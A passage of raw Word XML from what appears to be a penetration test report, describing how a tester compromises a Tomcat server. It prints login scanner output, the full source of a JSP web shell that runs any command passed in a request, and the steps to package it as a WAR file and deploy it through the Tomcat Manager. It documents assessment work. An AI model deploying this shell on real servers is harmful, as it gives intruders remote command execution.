          <w:p w14:paraId="0D75A81C" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Scanned 1 of 1 hosts (100% complete)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D7FF32A" w14:textId="75BEFFC7" w:rsidR="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="004539C5">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Auxiliary module execution completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47905FBF" w14:textId="38F96BAB" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004B0583">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Running the Login Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A442C8" w14:textId="04BF725A" w:rsidR="004B0583" w:rsidRDefault="004B0583" w:rsidP="004B0583">
      <w:r>
        <w:t xml:space="preserve">The tester then prepared a JSP web shell to upload to the Tomcat server to achieve remote code execution. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF76A8D" w14:textId="77777777" w:rsidR="004B0583" w:rsidRPr="004B0583" w:rsidRDefault="004B0583" w:rsidP="004B0583"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00655232" w14:paraId="5F0931C3" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="539A336C" w14:textId="77777777" w:rsidR="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">cat cmd.jsp </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78ECFD06" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DB39398" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;%@ page import="java.util.*,java.io.*"%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D32147F" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="154923A8" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31E99D81" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// JSP_KIT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A4C1D8D" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05169333" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// cmd.jsp = Command Execution (unix)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E19D15C" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F819B5A" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// by: Unknown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3198DF" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>// modified: 27/06/2003</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC2804D" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC0C2EC" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71028D01" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;HTML&gt;&lt;BODY&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09E86530" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;FORM METHOD="GET" NAME="myform" ACTION=""&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337EA5CD" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;INPUT TYPE="text" NAME="cmd"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CAB6844" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;INPUT TYPE="submit" VALUE="Send"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76CBB46B" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/FORM&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD56427" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;pre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="387032F7" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="435FFEE1" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>if (request.getParameter("cmd") != null) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C1CCB6" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        out.println("Command: " + request.getParameter("cmd") + "&lt;BR&gt;");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D74D31" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43B919EE" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        OutputStream os = p.getOutputStream();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F24A417" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        InputStream in = p.getInputStream();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB7DE06" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        DataInputStream dis = new DataInputStream(in);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47CD5396" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        String disr = dis.readLine();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0C7F4E" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        while ( disr != null ) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="197C96B3" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                out.println(disr); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BAE0FD1" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                disr = dis.readLine(); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA1A702" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3790C8A6" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="486E68BD" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB4EBBB" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/pre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0855CF95" w14:textId="0DC4534E" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A20FD27" w14:textId="65BAFC40" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004B0583">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Contents of JSP Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B211450" w14:textId="773D78D6" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:t>The web shell was compressed into a WAR archive file which can be deployed as an application via the Tomcat Web Application Manager.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00655232" w14:paraId="6AE922DD" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64360D95" w14:textId="633DD84B" w:rsidR="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">jar -cvf deploymenttest.war cmd.jsp </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D828089" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08B40624" w14:textId="77777777" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>added manifest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4258FCDB" w14:textId="128A0B92" w:rsidR="00655232" w:rsidRPr="00655232" w:rsidRDefault="00655232" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00655232">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>adding: cmd.jsp(in = 829) (out= 422)(deflated 49%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0107A1B6" w14:textId="0C5190C6" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Creating a WAR File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C97367" w14:textId="6AE93E0C" w:rsidR="004B0583" w:rsidRPr="004B0583" w:rsidRDefault="004B0583" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0583">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:t>The tester next logged in to the Tomcat Web Application Manager accessible at the URL http://192.168.195.205:8080/manager/html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672EEFA6" w14:textId="77777777" w:rsidR="004B0583" w:rsidRDefault="00655232" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DB5C7C1" wp14:editId="46E0B75C">
            <wp:extent cx="6858000" cy="3241040"/>
            <wp:effectExtent l="57150" t="114300" r="114300" b="54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3241040"/>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377F6525" w14:textId="6A053013" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004B0583">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Logged in to Tomcat Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F845AA5" w14:textId="5BA97AB8" w:rsidR="008241F8" w:rsidRPr="004B0583" w:rsidRDefault="004B0583" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0583">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, the tester uploaded the WAR file created earlier and deployed it as an application via the Tomcat Web Application Manager. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCDF864" w14:textId="77777777" w:rsidR="004B0583" w:rsidRDefault="00655232" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50838534" wp14:editId="5C9E5747">
            <wp:extent cx="6858000" cy="1443355"/>
